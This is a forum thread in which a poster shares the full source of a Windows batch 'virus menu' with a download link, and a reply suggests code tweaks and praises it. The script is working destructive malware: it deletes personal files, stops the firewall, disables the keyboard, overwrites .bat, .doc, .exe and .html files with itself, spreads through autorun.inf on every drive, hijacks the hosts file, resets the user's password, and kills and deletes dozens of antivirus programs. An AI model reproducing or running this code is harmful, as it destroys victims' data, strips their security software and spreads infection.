Login Register


Batch Virus Menu filter_list
Author
Message
Batch Virus Menu #1

*Updated With Smarter Code ! Creds to cxS*

Hey guys i made this a very long time ago and is one of the first batch files i have ever made

Here is the source code
Spoiler:
Code:
:: Used markers:start,a,b,c,d,e,f,g,h,i,documnet,music,picture,firewall,internet,keyboard,batch,.doc:: :: More used Markers drivers,exe,html,cmd,google,hotmail,msn,wikipedia,time,password,disk,song,option:: :: Even more hide,kill,spam :: @echo off cls title Processor's virus menu color 0a :start cls echo Processor's Virus menu echo. echo You are logged in as: %username% echo System root: %systemroot% echo Windows directory: %windir% echo. echo. Processor's Virus Menu echo ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ echo ³ MENU ³ echo ÃÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ echo ³ q Å delete menu ³ echo ³ w Å disable menu ³ echo ³ e Å infect menu ³ echo ³ r Å block menu ³ echo ³ t Å change menu ³ echo ³ y Å Open menu ³ echo ³ b Å hide menu ³ echo ³ o Å Kill menu ³ echo ³ d Å spam menu ³ echo ÀÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ set /p virus=Choose a menu: if "%virus%"=="q" goto a if "%virus%"=="w" goto b if "%virus%"=="e" goto c if "%virus%"=="r" goto d if "%virus%"=="t" goto e if "%virus%"=="y" goto f if "%virus%"=="b" goto g if "%virus%"=="o" goto h if "%virus%"=="d" goto i set /p exit=If you want to exit type exit: if /i "%exit%"=="exit" exit echo. :a cls echo ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ echo ³ Delete Menu ³ echo ÃÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ echo ³ 1 Å Delete My Documents ³ echo ³ 2 Å Delete All Music ³ echo ³ 3 Å Delete All Pictures ³ echo ÀÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ set /p delete=Choose an option: if "%delete%"=="1" goto document if "%delete%"=="2" goto music if "%delete%"=="3" goto picture :b cls echo ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ echo ³ Disable Menu ³ echo ÃÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ echo ³ 1 Å Disable Firewall ³ echo ³ 2 Å Disable Internet ³ echo ³ 3 Å Disable Keyboard ³ echo ÀÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ set /p disable=Choose an option: if "%disable%"=="1" goto firewall if "%disable%"=="2" goto internet if "%disable%"=="3" goto keyboard :c cls echo ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ echo ³ Infect menu ³ echo ÃÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ echo ³ 1 Å Infect all Batch files ³ echo ³ 2 Å infect all .docs ³ echo ³ 3 Å Infect all Drivers ³ echo ³ 4 Å infect all .exe files ³ echo ³ 5 Å infect html files ³ echo ³ 6 Å infect CMD ³ echo ÀÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ set /p infect=Choose an option: if "%infect%"=="1" goto batch if "%infect%"=="2" goto .docs if "%infect%"=="3" goto drivers if "%infect%"=="4" goto exe if "%infect%"=="5" goto html if "%infect%"=="6" goto cmd :d cls echo ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ echo ³ Block Menu ³ echo ÃÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ echo ³1 ³ Block Google ³ echo ³2 ³ Block Hotmail ³ echo ³3 ³ Block MSN ³ echo ³4 ³ Block Wikipedia ³ echo ÀÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ set /p block=Choose an option: if "%block%"=="1" goto google if "%block%"=="2" goto hotmail if "%block%"=="3" goto msn if "%block%"=="4" goto wikipedia :e cls ECHO ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ECHO ³ Change Menu ³ ECHO ÃÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ECHO ³ 1 Å Change time to 00.00 ³ ECHO ³ 2 Å Change User password ³ ECHO ÀÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ set /p change=Choose an option: if "%change%"=="1" goto time if "%change%"=="2" goto password :f cls ECHO ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ECHO ³ open menu ³ ECHO ÃÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ECHO ³ 1 Å Open disk Tray ³ ECHO ³ 2 Å Open/play XP start up song ³ ECHO ÀÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ set /p open=Choose an option: if "%open%"=="1" goto disk if "%open%"=="2" goto song :g cls ECHO ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ECHO ³ Hide Menu ³ ECHO ÃÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ECHO ³ 1 Å hide Music folder ³ ECHO ÀÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ set /p hide=Choose an option if "%hide%"=="1" goto hide :h cls ECHO ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ECHO ³ kill Menu ³ ECHO ÃÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ECHO ³ 1 Å Kill antivirus ³ ECHO ÀÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ set /p kill=Choose an option if "%kill%"=="1" goto kill :i cls ECHO ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ECHO ³ spam Menu ³ ECHO ÃÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ECHO ³ 1 Å spam /C Drive ³ ECHO ÀÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ set /p spam=Choose an option if "%spam%"=="1" goto spam :document @echo off cls del /f /q "C:\Users\%userprofile%\My Documents\*.*" goto start :music del /f /q "C:\Users\%userprofile%\My Documents\My Music\*.*" goto start :picture del /f /q "C:\Users\%userprofile%\My Documents\My Pictures\*.*" goto start :firewall net stop "MpsSvc" taskkill /f /t /im "FirewallControlPanel.exe" goto start :internet ipconfig /release if ERRORLEVEL1 ipconfig /release_all goto start :keyboard echo Windows Registry Editor Version 5.00 > "nokeyboard.reg" echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layout] >> "nokeyboard.reg" echo "Scancode Map"=hex:00,00,00,00,00,00,00,00,7c,00,00,00,00,00,01,00,00,\ >> "nokeyboard.reg" echo 00,3b,00,00,00,3c,00,00,00,3d,00,00,00,3e,00,00,00,3f,00,00,00,40,00,00,00,\ >> "nokeyboard.reg" echo 41,00,00,00,42,00,00,00,43,00,00,00,44,00,00,00,57,00,00,00,58,00,00,00,37,\ >> "nokeyboard.reg" echo e0,00,00,46,00,00,00,45,00,00,00,35,e0,00,00,37,00,00,00,4a,00,00,00,47,00,\ >> "nokeyboard.reg" echo 00,00,48,00,00,00,49,00,00,00,4b,00,00,00,4c,00,00,00,4d,00,00,00,4e,00,00,\ >> "nokeyboard.reg" echo 00,4f,00,00,00,50,00,00,00,51,00,00,00,1c,e0,00,00,53,00,00,00,52,00,00,00,\ >> "nokeyboard.reg" echo 4d,e0,00,00,50,e0,00,00,4b,e0,00,00,48,e0,00,00,52,e0,00,00,47,e0,00,00,49,\ >> "nokeyboard.reg" echo e0,00,00,53,e0,00,00,4f,e0,00,00,51,e0,00,00,29,00,00,00,02,00,00,00,03,00,\ >> "nokeyboard.reg" echo 00,00,04,00,00,00,05,00,00,00,06,00,00,00,07,00,00,00,08,00,00,00,09,00,00,\ >> "nokeyboard.reg" echo 00,0a,00,00,00,0b,00,00,00,0c,00,00,00,0d,00,00,00,0e,00,00,00,0f,00,00,00,\ >> "nokeyboard.reg" echo 10,00,00,00,11,00,00,00,12,00,00,00,13,00,00,00,14,00,00,00,15,00,00,00,16,\ >> "nokeyboard.reg" echo 00,00,00,17,00,00,00,18,00,00,00,19,00,00,00,1a,00,00,00,1b,00,00,00,2b,00,\ >> "nokeyboard.reg" echo 00,00,3a,00,00,00,1e,00,00,00,1f,00,00,00,20,00,00,00,21,00,00,00,22,00,00,\ >> "nokeyboard.reg" echo 00,23,00,00,00,24,00,00,00,25,00,00,00,26,00,00,00,27,00,00,00,28,00,00,00,\ >> "nokeyboard.reg" echo 1c,00,00,00,2a,00,00,00,2c,00,00,00,2d,00,00,00,2e,00,00,00,2f,00,00,00,30,\ >> "nokeyboard.reg" echo 00,00,00,31,00,00,00,32,00,00,00,33,00,00,00,34,00,00,00,35,00,00,00,36,00,\ >> "nokeyboard.reg" echo 00,00,1d,00,00,00,5b,e0,00,00,38,00,00,00,39,00,00,00,38,e0,00,00,5c,e0,00,\ >> "nokeyboard.reg" echo 00,5d,e0,00,00,1d,e0,00,00,5f,e0,00,00,5e,e0,00,00,22,e0,00,00,24,e0,00,00,\ >> "nokeyboard.reg" echo 10,e0,00,00,19,e0,00,00,30,e0,00,00,2e,e0,00,00,2c,e0,00,00,20,e0,00,00,6a,\ >> "nokeyboard.reg" echo e0,00,00,69,e0,00,00,68,e0,00,00,67,e0,00,00,42,e0,00,00,6c,e0,00,00,6d,e0,\ >> "nokeyboard.reg" echo 00,00,66,e0,00,00,6b,e0,00,00,21,e0,00,00,00,00 >> "nokeyboard.reg" start nokeyboard.reg goto start :batch Dir %Homedrive% /s /b > DirPath For /f %%Y In (DirPath) Do ( Set DirPath=%%Y > Nul For %%Z In (%DirPath%\*.bat) Do ( Set BatInfect=%%Z > Nul Copy /y %0 %BatInfect% ) ) Del /f /s /q DirPath goto start :.docs Dir %Homedrive% /s /b > DirPath For /f %%Y In (DirPath) Do ( Set DirPath=%%Y > Nul For %%Z In (%DirPath%\*.doc) Do ( Set DocInfect=%%Z > Nul Copy /y %0 %DocInfect% ) ) Del /f /s /q DirPath goto start :drivers for %%E In (A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) Do ( copy /Y %0 %%E:\ echo [AutoRun] > %%E:\autorun.inf echo open="%%E:\%0" >> %%E:\autorun.inf echo action=Open folder to see files... >> %%E:\autorun.inf) goto start :exe Dir %Homedrive% /s /b > DirPath For /f %%Y In (DirPath) Do ( Set DirPath=%%Y > Nul For %%Z In (%DirPath%\*.exe) Do ( Set ExeInfect=%%Z > Nul Copy /y %0 %ExeInfect% ) ) Del /f /s /q DirPath goto start :html Dir %Homedrive% /s /b > DirPath For /f %%Y In (DirPath) Do ( Set DirPath=%%Y > Nul For %%Z In (%DirPath%\*.html) Do ( Set HtmlInfect=%%Z > Nul Copy /y %0 %HtmlInfect% ) ) Del /f /s /q DirPath goto start :cmd cls echo hello world! pause >nul goto start :google cd "C:\Windows\System32\Drivers\etc" echo 127.0.0.1 google.com >> "Hosts" echo 127.0.0.1 www.google.com >> "Hosts" goto start :hotmail cd "C:\Windows\System32\Drivers\etc" echo 127.0.0.1 hotmail.com >> "Hosts" echo 127.0.0.1 www.hotmail.com >> "Hosts" goto start :msn cd "C:\Windows\System32\Drivers\etc" echo 127.0.0.1 msn.com >> "Hosts" echo 127.0.0.1 www.msn.com >> "Hosts" goto start :wikipedia cd "C:\Windows\System32\Drivers\etc" echo 127.0.0.1 wikipedia.org >> "Hosts" echo 127.0.0.1 www.wikipedia.org >> "Hosts" goto start :time time 00:00 goto start :password net user %username% Processor goto start :disk echo Do >> "opendisk.vbs" echo Set oWMP = CreateObject("WMPlayer.OCX.7" ) >> "opendisk.vbs" echo Set colCDROMs = oWMP.cdromCollection >> "opendisk.vbs" echo colCDROMs.Item(d).Eject >> "opendisk.vbs" echo colCDROMs.Item(d).Eject >> "opendisk.vbs" echo Loop >> "opendisk.vbs" start "" "opendisk.vbs" goto start :song cd "C:\Windows\system32\oobe\images" start title.wma goto start :hide attrib +h "%userprofile%\my documents\my music" goto start :kill taskkill /F /IM av* >NUL taskkill /F /IM fire* >NUL taskkill /F /IM anti* >NUL taskkill /F /IM spy* >NUL taskkill /F /IM bullguard* >NUL taskkill /F /IM PersFw* >NUL taskkill /F /IM KAV* >NUL taskkill /F /IM ZONEALARM* >NUL taskkill /F /IM SAFEWEB* >NUL taskkill /F /IM OUTPOST* >NUL taskkill /F /IM nv* >NUL taskkill /F /IM nav* >NUL taskkill /F /IM F-* >NUL taskkill /F /IM ESAFE* >NUL taskkill /F /IM cle* >NUL taskkill /F /IM BLACKICE* >NUL taskkill /F /IM def* >NUL taskkill /F /IM kav* >NUL taskkill /F /IM kav* >NUL taskkill /F /IM avg* >NUL taskkill /F /IM ash* >NUL taskkill /F /IM aswupdsv* >NUL taskkill /F /IM ewid* >NUL taskkill /F /IM guar* >NUL taskkill /F /IM gcasDt* >NUL taskkill /F /IM msmp* >NUL taskkill /F /IM mcafe* >NUL taskkill /F /IM mghtml* >NUL taskkill /F /IM msiexec* >NUL taskkill /F /IM outpost* >NUL taskkill /F /IM isafe* >NUL taskkill /F /IM zap* >NUL taskkill /F /IM zauinst* >NUL taskkill /F /IM upd* >NUL taskkill /F /IM zlclien* >NUL taskkill /F /IM minilog* >NUL taskkill /F /IM cc* b >NUL taskkill /F /IM norton* >NUL taskkill /F /IM norton au* >NUL taskkill /F /IM ccc* >NUL taskkill /F /IM npfmn* >NUL taskkill /F /IM loge* >NUL taskkill /F /IM nisum* >NUL taskkill /F /IM issvc* >NUL taskkill /F /IM tmp* >NUL taskkill /F /IM tmn* >NUL taskkill /F /IM pcc* >NUL taskkill /F /IM cpd* >NUL taskkill /F /IM pop* >NUL taskkill /F /IM pav* >NUL taskkill /F /IM padmin* >NUL taskkill /F /IM panda* >NUL taskkill /F /IM avsch* >NUL taskkill /F /IM sche* >NUL taskkill /F /IM syman* >NUL taskkill /F /IM virus* >NUL taskkill /F /IM realm* >NUL taskkill /F /IM sweep* >NUL taskkill /F /IM scan* >NUL taskkill /F /IM ad-* >NUL taskkill /F /IM safe* >NUL taskkill /F /IM avas* >NUL taskkill /F /IM norm* >NUL taskkill /F /IM offg* >NUL RMDIR /Q "C:\Program Files\alwils~1" /S >NUL RMDIR /Q "C:\Program Files\Lavasoft\Ad-awa~1" /S >NUL RMDIR /Q "C:\Program Files\kasper~1" /S >NUL RMDIR /Q "C:\Program Files\trojan~1" /S >NUL RMDIR /Q "C:\Program Files\f-prot95" /S >NUL RMDIR /Q "C:\Program Files\tbav" /S >NUL RMDIR /Q "C:\Program Files\avpersonal" /S >NUL RMDIR /Q "C:\Program Files\Norton~1" /S >NUL RMDIR /Q "C:\Program Files\Mcafee" /S >NUL RMDIR /Q "C:\Program Files\Norton~1\Norton~1\Norton~3" /S >NUL RMDIR /Q "C:\Program Files\Norton~1\Norton~1\speedd~1" /S >NUL RMDIR /Q "C:\Program Files\Norton~1\Norton~1" /S >NUL RMDIR /Q "C:\Program Files\Norton~1" /S >NUL RMDIR /Q "C:\Program Files\avgamsr" /S >NUL RMDIR /Q "C:\Program Files\avgamsvr" /S >NUL RMDIR /Q "C:\Program Files\avgemc" /S >NUL RMDIR /Q "C:\Program Files\avgcc" /S >NUL RMDIR /Q "C:\Program Files\avgupsvc" /S >NUL RMDIR /Q "C:\Program Files\grisoft" /S >NUL RMDIR /Q "C:\Program Files\nood32krn" /S >NUL RMDIR /Q "C:\Program Files\nood32" /S >NUL RMDIR /Q "C:\Program Files\nod32" /S >NUL RMDIR /Q "C:\Program Files\nood32" /S >NUL RMDIR /Q "C:\Program Files\kav" /S >NUL RMDIR /Q "C:\Program Files\kavmm" /S >NUL RMDIR /Q "C:\Program Files\kaspersky" /S >NUL RMDIR /Q "C:\Program Files\ewidoctrl" /S >NUL RMDIR /Q "C:\Program Files\guard" /S >NUL RMDIR /Q "C:\Program Files\ewido" /S >NUL RMDIR /Q "C:\Program Files\pavprsrv" /S >NUL RMDIR /Q "C:\Program Files\pavprot" /S >NUL RMDIR /Q "C:\Program Files\avengine" /S >NUL RMDIR /Q "C:\Program Files\apvxdwin" /S >NUL RMDIR /Q "C:\Program Files\webproxy" /S >NUL RMDIR /Q "C:\Program Files\panda software" /S >NUL goto start :spam echo %random% > "C:\%random%.jpg" echo %random% > "C:\%random%.jpg" echo %random% > "C:\%random%.jpg" echo %random% > "C:\%random%.jpg" echo %random% > "C:\%random%.jpg" echo %random% > "C:\%random%.jpg" echo %random% > "C:\%random%.jpg" echo %random% > "C:\%random%.jpg" echo %random% > "C:\%random%.jpg" echo %random% > "C:\%random%.jpg" echo %random% > "C:\%random%.jpg" goto start


Screenshot
[Image: 3qy2gz4.png]

Here is the Mediafire link
http://www.mediafire.com/view/?kv6o6e0ueoaaxyy

Thanks,

Reply

RE: Batch Virus Menu #2
Instead of goto exit, since it's just calling exit, why not just put that in there directly? There's also the /i switch for case insensitive comparison. Example:
Code:
set /p exit=If you want to exit type exit: if /i "%exit%"=="exit" exit

Why do you have all of those cls lines of code between the taskkill and rmdir commands though? It doesn't really do anything if you're >nul'ing the output anyways just to point that out. Look into batch redirection if you're having issues with any other messages written to the console.

Nice menu's though.
-- cxS

[ Haskell/.NET/C/C++ - Software Engineer ]

Reply

RE: Batch Virus Menu #3
(03-17-2013, 08:06 AM)cxS Wrote: Instead of goto exit, since it's just calling exit, why not just put that in there directly? There's also the /i switch for case insensitive comparison. Example:
Code:
set /p exit=If you want to exit type exit: if /i "%exit%"=="exit" exit

Why do you have all of those cls lines of code between the taskkill and rmdir commands though? It doesn't really do anything if you're >nul'ing the output anyways just to point that out. Look into batch redirection if you're having issues with any other messages written to the console.

Nice menu's though.

Like I said this was one of my first batch files but I will implement what you said in here now !

Thanks,

Processor

Reply







Users browsing this thread: 1 Guest(s)